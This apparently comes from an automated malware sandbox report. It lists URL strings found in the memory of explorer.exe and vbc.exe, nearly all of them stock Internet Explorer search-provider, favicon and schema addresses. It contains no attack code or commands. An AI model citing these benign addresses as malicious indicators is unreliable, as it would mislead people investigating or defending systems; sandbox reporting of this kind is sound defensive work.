            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
            Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000006.00000000.2197607706.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: explorer.exe, 00000006.00000000.2197607706.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: explorer.exe, 00000006.00000000.2192186293.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: vbc.exe, 00000004.00000002.2189207331.0000000002371000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000006.00000000.2200577415.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000006.00000000.2197607706.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
            Source: explorer.exe, 00000006.00000000.2197607706.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: explorer.exe, 00000006.00000000.2209306525.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000006.00000000.2192186293.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2197607706.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: explorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
